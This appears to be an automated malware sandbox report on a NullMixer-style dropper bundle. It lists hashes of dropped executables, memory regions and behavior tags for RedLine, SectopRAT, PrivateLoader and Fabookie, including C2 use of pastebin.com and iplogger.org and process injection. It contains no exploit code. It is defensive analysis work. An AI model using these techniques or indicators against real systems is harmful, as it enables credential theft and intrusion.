| SHA512 | 857f44a1383c29208509b8f1164b6438d750d5bb4419add7626986333433e67a0d1211ec240ce9472f30a1f32b16c8097aceba4b2255641b3d8928f94237f595 |
C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\libstdc++-6.dll
| MD5 | 5e279950775baae5fea04d2cc4526bcc |
| SHA1 | 8aef1e10031c3629512c43dd8b0b5d9060878453 |
| SHA256 | 97de47068327bb822b33c7106f9cbb489480901a6749513ef5c31d229dcaca87 |
| SHA512 | 666325e9ed71da4955058aea31b91e2e848be43211e511865f393b7f537c208c6b31c182f7d728c2704e9fc87e7d1be3f98f5fee4d34f11c56764e1c599afd02 |
C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\libgcc_s_dw2-1.dll
| MD5 | 9aec524b616618b0d3d00b27b6f51da1 |
| SHA1 | 64264300801a353db324d11738ffed876550e1d3 |
| SHA256 | 59a466f77584438fc3abc0f43edc0fc99d41851726827a008841f05cfe12da7e |
| SHA512 | 0648a26940e8f4aad73b05ad53e43316dd688e5d55e293cce88267b2b8744412be2e0d507dadad830776bf715bcd819f00f5d1f7ac1c5f1c4f682fb7457a20d0 |
memory/2212-69-0x000000006B280000-0x000000006B2A6000-memory.dmp
memory/2212-75-0x0000000064940000-0x0000000064959000-memory.dmp
memory/2212-86-0x000000006B280000-0x000000006B2A6000-memory.dmp
memory/2212-85-0x000000006FE40000-0x000000006FFC6000-memory.dmp
memory/2212-87-0x000000006B280000-0x000000006B2A6000-memory.dmp
memory/2212-82-0x000000006FE40000-0x000000006FFC6000-memory.dmp
memory/2212-83-0x000000006FE40000-0x000000006FFC6000-memory.dmp
memory/2212-84-0x000000006FE40000-0x000000006FFC6000-memory.dmp
memory/2212-81-0x000000006FE40000-0x000000006FFC6000-memory.dmp
memory/1840-88-0x0000000004F70000-0x0000000004FA6000-memory.dmp
memory/2212-80-0x000000006B440000-0x000000006B4CF000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\Tue196397c0f84f8.exe
| MD5 | 7c20266d1026a771cc3748fe31262057 |
| SHA1 | fc83150d1f81bfb2ff3c3d004ca864d53004fd27 |
| SHA256 | 4b2fb0f42a923104b69a45aa7a503fbd08739ebf3711599303aa15692136fa46 |
| SHA512 | e18c803e38a2111857519639b1ac838edc5b496a79fc579c7329188c66ba791cc499874132e4d616c24447d0cc5ebe7659f69ed1a810bea1a675b94d089b995f |
C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\Tue1968b7ee9058232e8.exe
| MD5 | 21a61f35d0a76d0c710ba355f3054c34 |
| SHA1 | 910c52f268dbbb80937c44f8471e39a461ebe1fe |
| SHA256 | d9c606fa8e99ee0c5e55293a993fb6a69e585a32361d073907a8f8e216d278dd |
| SHA512 | 3f33f07aee83e8d1538e5e3d1b723876ddbecc2a730b8eaf7846522f78f5fc6b65ed23085c3a51e62c91dc80b73c171d8f32c44b92cf144689a834e33ea01b3e |
C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\Tue19f40f8518b9946.exe
| MD5 | a4bf9671a96119f7081621c2f2e8807d |
| SHA1 | 47f50ae20bfa8b277f8c8c1963613d3f4c364b94 |
| SHA256 | d9e5cf75da07717a818853d2f1aa79d3d1aaa155bb06fffed3c92ccaf972aef7 |
| SHA512 | f0af42f99f09b5c118ebd275d0b905b91d93893034c98b84c370e7243e1b55502585808cfa33a1779d478f6e308eb32f1896d57a5f6fab0edc4362def08a5b0a |
C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\Tue19b4b38a7569a9.exe
| MD5 | 26278caf1df5ef5ea045185380a1d7c9 |
| SHA1 | df16e31d1dd45dc4440ec7052de2fc026071286c |
| SHA256 | d626180356047eff85c36abbc7a1752c4f962d79070ffc7803b8db2af3be9be5 |
| SHA512 | 007f092dfef8895e9b4cd3605544df9cd57e701d154ce89f950f8642462b535725edf89b58c0a240bc080a45c9b5229633fe8b2c20e90c7db65bc1e87bc44e03 |
C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\Tue19cd42a7c874e44.exe
| MD5 | 0c4602580c43df3321e55647c7c7dfdb |
| SHA1 | 5e4c40d78db55305ac5a30f0e36a2e84f3849cd1 |
| SHA256 | fa02543c043d0ca718baf3dfafb7f5d0c018d46ee6e0f0220095e5874f160752 |
| SHA512 | 02042264bc14c72c1e8e785812b81dad218e2ecf357db5497e80eabc739c4ad7d9176b6a9e061b909dac1ea188a7ca9e3b1c610c97d52e020ccd947f286dbe11 |
C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\Tue192c34b1c2f5.exe
| MD5 | 8b6f3a6e8d9797093a78f0b85da4a1fc |
| SHA1 | 2f8346a3ec3427c5a7681d166501f8f42f620b3b |
| SHA256 | 5f465c9a74f35fef4a66cbf336dc90bed8bc8caf7b51a98cb52406942c05a0e8 |
| SHA512 | c0ad94faa01f5f3fd67a90df327bd0862243c1f335ccf2582f92867f3c751dfdaf73b7e2d86bd494ca1cc8ba199db7964d61493cd37855a35acbfe0256d2f7ef |
C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\Tue19c9e031f4.exe
| MD5 | 0b67130e7f04d08c78cb659f54b20432 |
| SHA1 | 669426ae83c4a8eacf207c7825168aca30a37ca2 |
| SHA256 | bca8618b405d504bbfe9077e3ca0f9fdb01f5b4e0e0a12409031817a522c50ac |
| SHA512 | 8f5495b850b99f92f18113d9759469768d3e16b4afa8ccdee5504886bced6a9ac75184f7c48f627ead16ce67834f5a641d6cea2cb5420e35c26e612572b12c79 |
memory/1840-114-0x0000000005EB0000-0x0000000005F16000-memory.dmp
memory/4956-133-0x00000000009B0000-0x0000000000A22000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\Tue193e530416b51740a.exe
| MD5 | a2326dff5589a00ed3fd40bc1bd0f037 |
| SHA1 | 66c3727fb030f5e1d931de28374cf20e4693bbf4 |
| SHA256 | 550d66af5c386718a10f69652645f21357d305b3e9477c55516201570f9ea28c |
| SHA512 | fd56a630dc37a5322b68502e66fbe2ff54ae94ca61bf0f8e116db002d4038f85722816a5e8ec0f6c0343d250c93a7909185564166591a44d0402aa0c5928e826 |
memory/4956-135-0x00000000050D0000-0x0000000005146000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\is-AKAG5.tmp\Tue196397c0f84f8.tmp
| MD5 | 9303156631ee2436db23827e27337be4 |
| SHA1 | 018e0d5b6ccf7000e36af30cebeb8adc5667e5fa |
| SHA256 | bae22f27c12bce1faeb64b6eb733302aff5867baa8eed832397a7ce284a86ff4 |
| SHA512 | 9fe100fafb1c74728109667b5a2261a31e49c45723de748adaa1d9cb9f8daa389b871056c70066fa3a05be82a5017c8dd590ae149a56d824a9e250d31091a40f |
memory/4880-148-0x0000000000890000-0x0000000000898000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\is-T4K51.tmp\idp.dll
| MD5 | b37377d34c8262a90ff95a9a92b65ed8 |
| SHA1 | faeef415bd0bc2a08cf9fe1e987007bf28e7218d |
| SHA256 | e5a0ad2e37dde043a0dd4ad7634961ff3f0d70e87d2db49761eb4c1f468bb02f |
| SHA512 | 69d8da5b45d9b4b996d32328d3402fa37a3d710564d47c474bf9e15c1e45bc15b2858dbab446e6baec0c099d99007ff1099e9c4e66cfd1597f28c420bb50fdcc |
C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\Tue193129b31e741ef3.exe
| MD5 | bf2f6094ceaa5016d7fb5e9e95059b6b |
| SHA1 | 25583e0b5a4e331a0ca97b01c5f4ecf6b2388bad |
| SHA256 | 47f383df5f55f756468fbb141377bed62056d72d933d675b3c3267d7be4b7f12 |
| SHA512 | 11d54869e1690824e74e33ee2e9975d28b77730588dde0eee540eefabdedf46576395301aeb607de2cf009b721172209d66a273ca5e3144061c1bdbe41e03f78 |
C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\Tue19c28f648204dbd4.exe
| MD5 | 91e3bed725a8399d72b182e5e8132524 |
| SHA1 | 0f69cbbd268bae2a7aa2376dfce67afc5280f844 |
| SHA256 | 18af3c7bdeb815af9abe9dcc4f524b2fb2a33ac9cc6784f31e302c10a8d09a0d |
| SHA512 | 280fe25f4813bc261dee3b38ad03364896f3b4f049dcf1d94c6c6e7abb09b47e06445746719d902281d04cc15879d745dd0b71a466fa31f952ae51f90360ae76 |
C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\Tue19d1fc7d2654d7a.exe
| MD5 | 363f9dd72b0edd7f0188224fb3aee0e2 |
| SHA1 | 2ee4327240df78e318937bc967799fb3b846602e |
| SHA256 | e730ae821668acc373e3126bdba84b6d2b74bfdc183a23bcea5cfc94a4802167 |
| SHA512 | 72681c776ba5f10e7a9c9e40f419dc79772a1370fd92cfe7f87d48a4baceb1aa381ab3a7b9b6f87780e5ee02fda108158497c13c611d2ece914241920c96aece |
memory/4956-166-0x0000000005980000-0x0000000005F24000-memory.dmp
memory/4840-168-0x0000000000E90000-0x0000000000F00000-memory.dmp
memory/2480-167-0x00000000008C0000-0x0000000000930000-memory.dmp
memory/1584-173-0x0000000000400000-0x0000000000414000-memory.dmp
memory/404-178-0x0000000000400000-0x0000000000414000-memory.dmp
memory/4944-182-0x0000000005E70000-0x0000000005EBC000-memory.dmp
memory/4944-177-0x0000000005D90000-0x0000000005DAE000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\is-EO89R.tmp\_isetup\_shfoldr.dll
| MD5 | 92dc6ef532fbb4a5c3201469a5b5eb63 |
| SHA1 | 3e89ff837147c16b4e41c30d6c796374e0b8e62c |
| SHA256 | 9884e9d1b4f8a873ccbd81f8ad0ae257776d2348d027d811a56475e028360d87 |
| SHA512 | 9908e573921d5dbc3454a1c0a6c969ab8a81cc2e8b5385391d46b1a738fb06a76aa3282e0e58d0d2ffa6f27c85668cd5178e1500b8a39b1bbae04366ae6a86d3 |
memory/4468-176-0x0000000000400000-0x00000000004BD000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\Tue19cef5687a.exe
| MD5 | c1bc0cca3a8784bbc7d5d3e9e47e6ba4 |
| SHA1 | 500970243e0e1dd57e2aad4f372da395d639b4a3 |
| SHA256 | 5d1b978e6d2896796f0f63043ecaa1748c1c7245ccda02115afc5594e3f5e3b1 |
| SHA512 | 929893f5359493bdcf2d2ba9d08a7fe808219c6a93f7f1433d915c520f84a9b03bd2c642722321b9875c1227672ce0773f76220bbde50aadc71754d82ffadbd5 |
memory/1668-192-0x0000000000400000-0x0000000000422000-memory.dmp
memory/2212-195-0x0000000000400000-0x000000000051C000-memory.dmp
memory/2212-204-0x0000000064940000-0x0000000064959000-memory.dmp
memory/2212-203-0x000000006B280000-0x000000006B2A6000-memory.dmp
memory/2212-202-0x000000006FE40000-0x000000006FFC6000-memory.dmp
memory/2212-201-0x000000006B440000-0x000000006B4CF000-memory.dmp
memory/2212-199-0x000000006EB40000-0x000000006EB63000-memory.dmp
memory/4956-150-0x0000000005250000-0x000000000526E000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\Tue1932df4dae.exe
| MD5 | c90e5a77dd1e7e03d51988bdb057bd9f |
| SHA1 | 498bd4b07d9e11133943e63c2cf06e28d9e99fc5 |
| SHA256 | cca0d3fb3f19615d643d47b3284fe26ffe359c0d2602e5f1877193c1227bfb54 |
| SHA512 | bbdfb7452df93c9425eaea10658e662725ee0de1a30993220231c3e8385f09baeabf78484b41e5780602b51e05f28d767d35e5960c18a246d9b1072783cbad34 |
memory/3968-134-0x0000000002E70000-0x0000000002E76000-memory.dmp
memory/2012-217-0x0000000005850000-0x000000000595A000-memory.dmp
memory/2012-216-0x0000000005CC0000-0x00000000062D8000-memory.dmp
memory/2012-218-0x00000000057C0000-0x00000000057FC000-memory.dmp
memory/4816-215-0x00000000056C0000-0x00000000056D2000-memory.dmp
memory/1840-220-0x000000006DB10000-0x000000006DB5C000-memory.dmp
memory/1840-231-0x00000000076D0000-0x0000000007773000-memory.dmp
memory/4944-232-0x000000006DB10000-0x000000006DB5C000-memory.dmp
memory/4944-243-0x00000000077E0000-0x0000000007E5A000-memory.dmp
memory/1840-248-0x00000000078A0000-0x00000000078AA000-memory.dmp
memory/1840-249-0x0000000007A90000-0x0000000007B26000-memory.dmp
memory/4944-244-0x0000000006E80000-0x0000000006E9A000-memory.dmp
memory/4944-250-0x0000000007340000-0x0000000007351000-memory.dmp
memory/1840-230-0x0000000006AB0000-0x0000000006ACE000-memory.dmp
memory/1516-251-0x0000000000400000-0x0000000002F02000-memory.dmp
memory/4944-256-0x0000000007380000-0x0000000007394000-memory.dmp
memory/4944-268-0x0000000007460000-0x0000000007468000-memory.dmp
memory/4944-267-0x0000000007470000-0x000000000748A000-memory.dmp
memory/4296-282-0x0000000003230000-0x0000000003420000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\TfSay.w
| MD5 | 8649bd267357309e3ceaf325ef72ee1e |
| SHA1 | 7ea28d42e186163a536cdd276aafac6bf1ec9a2e |
| SHA256 | 98b9eb7f7bdab1e321d89320bbf37c6dd2f27a133c6886931a05dde265fbdfe1 |
| SHA512 | 4bf603a2a08e241041910b6e812f3786f8ee5abeb4932f06aee7cf67ad39dba02937bb4b34a8d886ac6c98d419445ed06dd6c0df4dd6393f5ec0c70a30d3747b |
C:\Users\Admin\AppData\Local\Temp\rqC~~.A
| MD5 | 32ec5a7f8e578bbb6142b3c7972b5e3e |
| SHA1 | dc335867f93b0e9e2f1d20ce520bb143789d733c |
| SHA256 | 7d828c11e69048323472ea71f6fd00bc26d6453ecb5f8972cf584d42a5748ec7 |
| SHA512 | 042457ce38a4a3f2378827030a232192cda2e072a1e9761a71d85ad01c030a78f0e3f11f78b118d778a9f49822efd30b1d4cddf124375cd47c9dab0cab9602ff |
C:\Users\Admin\AppData\Local\Temp\F3U_R.J
| MD5 | ac6ad5d9b99757c3a878f2d275ace198 |
| SHA1 | 439baa1b33514fb81632aaf44d16a9378c5664fc |
| SHA256 | 9b8db510ef42b8ed54a3712636fda55a4f8cfcd5493e20b74ab00cd4f3979f2d |
| SHA512 | bfcdcb26b6f0c288838da7b0d338c2af63798a2ece9dcd6bc07b7cadf44477e3d5cfbba5b72446c61a1ecf74a0bccc62894ea87a40730cd1d4c2a3e15a7bb55b |
memory/4920-283-0x0000000000400000-0x0000000002F22000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
| MD5 | 968cb9309758126772781b83adb8a28f |
| SHA1 | 8da30e71accf186b2ba11da1797cf67f8f78b47c |
| SHA256 | 92099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a |
| SHA512 | 4bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | da16367083d29b4efb1510cec1bc787f |
| SHA1 | 59b6161c47cc8007610d8ada36e42e3bf4c6730c |
| SHA256 | 9d300d18285835f72f1df4c34dcefe6834b88627aa33bad03a5860e66a9dcb96 |
| SHA512 | 4d8b6a4627d2ce0355ae8ae181162a1fdc9aaa120b613606abe0e511a0fac7d337b209b4ee69a33a63fc3b77d2e8dbe27e3175951a3156f9f56e42b3d60bff10 |
memory/1840-252-0x0000000007A50000-0x0000000007A5E000-memory.dmp
memory/1840-219-0x0000000006AD0000-0x0000000006B02000-memory.dmp
memory/2012-214-0x0000000000400000-0x0000000000422000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Tue19d1fc7d2654d7a.exe.log
| MD5 | e5352797047ad2c91b83e933b24fbc4f |
| SHA1 | 9bf8ac99b6cbf7ce86ce69524c25e3df75b4d772 |
| SHA256 | b4643874d42d232c55bfbb75c36da41809d0c9ba4b2a203049aa82950345325c |
| SHA512 | dd2fc1966c8b3c9511f14801d1ce8110d6bca276a58216b5eeb0a3cfbb0cc8137ea14efbf790e63736230141da456cbaaa4e5c66f2884d4cfe68f499476fd827 |
memory/4816-209-0x0000000000400000-0x0000000000422000-memory.dmp
memory/4944-130-0x0000000005870000-0x0000000005BC4000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\Tue197e9ec0ff0.exe
| MD5 | b4c503088928eef0e973a269f66a0dd2 |
| SHA1 | eb7f418b03aa9f21275de0393fcbf0d03b9719d5 |
| SHA256 | 2a95ce43c87b8a26be71a459eae796a572422bd99cf0b9a3580a3a68e7dbd1a2 |
| SHA512 | c6fe2e2b5fbf9348701d1721f2b7ac7589b04b0308ae152e3a7186692b14f35e55bc7eed0c94a03031837b6f2b6aa4dc8d094aefce02913f1fbc4dedea452465 |
memory/3968-123-0x0000000000D20000-0x0000000000D38000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_fbidq42o.lrl.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/4536-284-0x0000000000400000-0x00000000016FB000-memory.dmp
memory/1840-113-0x0000000005E40000-0x0000000005EA6000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\Tue19ac3c92c21.exe
| MD5 | 962b4643e91a2bf03ceeabcdc3d32fff |
| SHA1 | 994eac3e4f3da82f19c3373fdc9b0d6697a4375d |
| SHA256 | d2671668c6b2c9da5d319e60dea54361a2cbb362e46628cf0dccb5ff0baf786b |
| SHA512 | ef6f4a5ccfff09506c925003ac49837d771787028fddcf2183e98cba2794df375fd0d5099e36abf8fedfc0dddd10ad076d2fc69a77b8ffd8180215b5cfc88dfd |
memory/404-109-0x0000000000400000-0x0000000000414000-memory.dmp
memory/1840-105-0x0000000005550000-0x0000000005572000-memory.dmp
memory/4296-285-0x00000000037D0000-0x0000000003875000-memory.dmp
memory/4944-89-0x0000000005160000-0x0000000005788000-memory.dmp
memory/4296-289-0x0000000003880000-0x0000000003912000-memory.dmp
memory/4296-286-0x0000000003880000-0x0000000003912000-memory.dmp
memory/1584-290-0x0000000000400000-0x0000000000414000-memory.dmp
memory/2212-78-0x000000006B440000-0x000000006B4CF000-memory.dmp
memory/2212-77-0x000000006B440000-0x000000006B4CF000-memory.dmp
memory/2212-76-0x0000000064940000-0x0000000064959000-memory.dmp
memory/2212-74-0x0000000064941000-0x000000006494F000-memory.dmp
memory/2212-73-0x00000000007F0000-0x000000000087F000-memory.dmp
memory/2520-300-0x0000000000400000-0x00000000004BD000-memory.dmp
memory/2212-79-0x000000006B440000-0x000000006B4CF000-memory.dmp
memory/4296-322-0x0000000003230000-0x0000000003420000-memory.dmp
memory/4920-321-0x0000000000400000-0x0000000002F22000-memory.dmp
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports
| MD5 | d751713988987e9331980363e24189ce |
| SHA1 | 97d170e1550eee4afc0af065b78cda302a97674c |
| SHA256 | 4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945 |
| SHA512 | b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State
| MD5 | 80aaca2f3c92e76b0955b1994e870d2b |
| SHA1 | ab262579f2f220dfa830f02ebccfbd6cde2b34ef |
| SHA256 | 14edecb3a5f24d3e1ceb9bc23c941201637746751191d46926121fbec53248aa |
| SHA512 | e7178bfd7397c5ea7a273c5cad45e965a88f38b5d98dcb0fcd549b31553060a942d935e181027e9a3a58dde34674d140ddaeb82634aed37e18e90d0cc9d07cbf |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | 387159609c7681169f3caee879a7aed5 |
| SHA1 | c9edb92b0b5afd4dc4fc48271e8e52447b466451 |
| SHA256 | a1f1245f2548f1c170a842b889a87694aa68277e07a4302e66f4af64944c2eb8 |
| SHA512 | 2077f634f9eec4f759445abc98c6454b1983b2b65c8d70a8f2d38c662f120662b7a480a5d5e37f40f05c527bbe5099adfd05d4c6b7d3117c858d6127edf33454 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\0c878a22-07ff-4697-8321-8276b2144a05.tmp
| MD5 | 8d2a482d36c06f53e4816feb13065a68 |
| SHA1 | 5c7d3ff4ec82676313f61adda9fc45a6b42fef8e |
| SHA256 | ac057ddfc1105dc56f515676a71033100308979b1a97546db359577df51780ee |
| SHA512 | d701a9f3fdc42da5c2eca69e070ad8bac2a97d406f68b14e20118b67c3f676eace0070fd93e021054a528203214f5664fa3533dd3052693fa6b1831a728083b9 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
| MD5 | 9c44c2faeefda884c93043fcdaf32086 |
| SHA1 | 18f714f743d9b9241254d689b3bda72e667efdcd |
| SHA256 | ce04396fe1a2db49bcb24385729462b197c4a9f598faa2fb850d072575820d99 |
| SHA512 | 4686d0626895514e1756fbe9751951551e25600e89ee08b9cc6d34f4d4533584b62e2d4d5d5d8399ec4e937e73ad6832e81aefeeb0e8b5aa0df46fbf056f2a3c |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | f2ec0f11ad71a19ff429683e8634bb42 |
| SHA1 | 622784701f7526e5886bf79df3a4709d0cdaa7f2 |
| SHA256 | f8cee2fae12f3620eb73e277aaa886b89aee1d836bcd2ecec1c7434fc36ed414 |
| SHA512 | 1cd0900d63923fafd034330d18503df66fd853eadaf8e22fe7f6c3ceb2d4d209ab808fa07a8888502a83cc2c6291514abf38d2505f9882aca8108c80fb419e09 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences
| MD5 | 0d54bacb2e4b4c893e2f17dac6895d00 |
| SHA1 | eefdd0e31464fe13b8303393d71261e69d8aa275 |
| SHA256 | 5eeb2e1d5597cb2e6fd5d41109a804f04cec7f1bc8cb5fcced9ce230ed5ecbf3 |
| SHA512 | 8cdc65d7b77269d75420d40954b733a832c94c957e1e625d3aefa2c752b71d151f4d891e3aa9602be475e01dbd3a72ab52623434078f2e4cbe756c2e6064d4a1 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State
| MD5 | 799369fa87f824a5400cda941003a1f3 |
| SHA1 | 0444bd892dadff101838309ab84bd85db5ddd88f |
| SHA256 | 1a36055d2fd545f69d849e15e81aca7497734e80da54be45782106bcf2e10400 |
| SHA512 | 4f8ef9f4f18d4f1b3cf131c4c528ae0a370993f9eeb7dec0b91d7d379d4bcea2be5300802ddb0418b9e110ba86430d695e94651f9d66359894cbd90c26502cf1 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\BrowsingTopicsState
| MD5 | be6585ee90570bbc7498413f7a13a80e |
| SHA1 | ee35d02aca7966a2a2fb2505a6447e22fc06528e |
| SHA256 | 3fc338eb10b1c031abc65fa76261b494dbdcf61e370fe3006f5ce1087343576d |
| SHA512 | 4f746626e5504eff9024d4e7b1f7b9e9e6c94d4edb93a755525375e5b4d5d470da52823be49bc02616722eb45c1c8828c69477a0231559d7b88bc64e5be40103 |
memory/4296-413-0x0000000003880000-0x0000000003912000-memory.dmp
memory/4296-414-0x0000000003920000-0x000000000451B000-memory.dmp
memory/4296-415-0x0000000004520000-0x00000000045AB000-memory.dmp
memory/4296-416-0x00000000045B0000-0x0000000004637000-memory.dmp
memory/4296-419-0x00000000045B0000-0x0000000004637000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\77fa9b46-2438-4487-9265-e1f2cedef883.tmp
| MD5 | da75bb05d10acc967eecaac040d3d733 |
| SHA1 | 95c08e067df713af8992db113f7e9aec84f17181 |
| SHA256 | 33ae9b8f06dc777bb1a65a6ba6c3f2a01b25cd1afc291426b46d1df27ea6e7e2 |
| SHA512 | 56533de53872f023809a20d1ea8532cdc2260d40b05c5a7012c8e61576ff092f006a197f759c92c6b8c429eeec4bb542073b491ddcfd5b22cd4ecbe1a8a7c6ef |
memory/4296-430-0x0000000000F10000-0x0000000000F14000-memory.dmp
memory/4296-429-0x0000000000F00000-0x0000000000F01000-memory.dmp
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State
| MD5 | c20c4bfaa7e41cea5f6ede46fd72cffc |
| SHA1 | fd792cc18b1188e02dbb7d29ef76c60aeede49a3 |
| SHA256 | 98e8dd658b510fb3ad7e5b30f750b77f77bd81e334d5a8f2210d2159e34c07f0 |
| SHA512 | e78371a34b308acb4ca563183f0fac8fa5ee6a7f2df30523569126f46084af4da8ff1e31ad439f55ff58b98a9627bb95727c91d2bd16a74d96ea0efb016bd3b2 |
Analysis: behavioral11
Detonation Overview
Submitted
2024-11-10 17:24
Reported
2024-11-10 17:27
Platform
win7-20240729-en
Max time kernel
148s
Max time network
149s
Command Line
Signatures
Detect Fabookie payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Fabookie
Fabookie family
NullMixer
Nullmixer family
PrivateLoader
Privateloader family
RedLine
RedLine payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Redline family
SectopRAT
SectopRAT payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Sectoprat family
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
ASPack v2.12-2.42
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Executes dropped EXE
Loads dropped DLL
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip-api.com | N/A | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 2176 set thread context of 1692 | N/A | C:\Users\Admin\AppData\Local\Temp\7zS8763E087\Wed09c36f786070b6.exe | C:\Users\Admin\AppData\Local\Temp\7zS8763E087\Wed09c36f786070b6.exe |
| PID 872 set thread context of 1452 | N/A | C:\Users\Admin\AppData\Local\Temp\7zS8763E087\Wed09f3b13c770637f.exe | C:\Users\Admin\AppData\Local\Temp\7zS8763E087\Wed09f3b13c770637f.exe |
| PID 2708 set thread context of 1552 | N/A | C:\Users\Admin\AppData\Local\Temp\7zS8763E087\Wed09e3a07534aa.exe | C:\Users\Admin\AppData\Local\Temp\7zS8763E087\Wed09e3a07534aa.exe |
Enumerates physical storage devices
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\7zS8763E087\Wed096e68af113.exe |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\7zS8763E087\setup_install.exe |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS8763E087\Wed09e3a07534aa.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
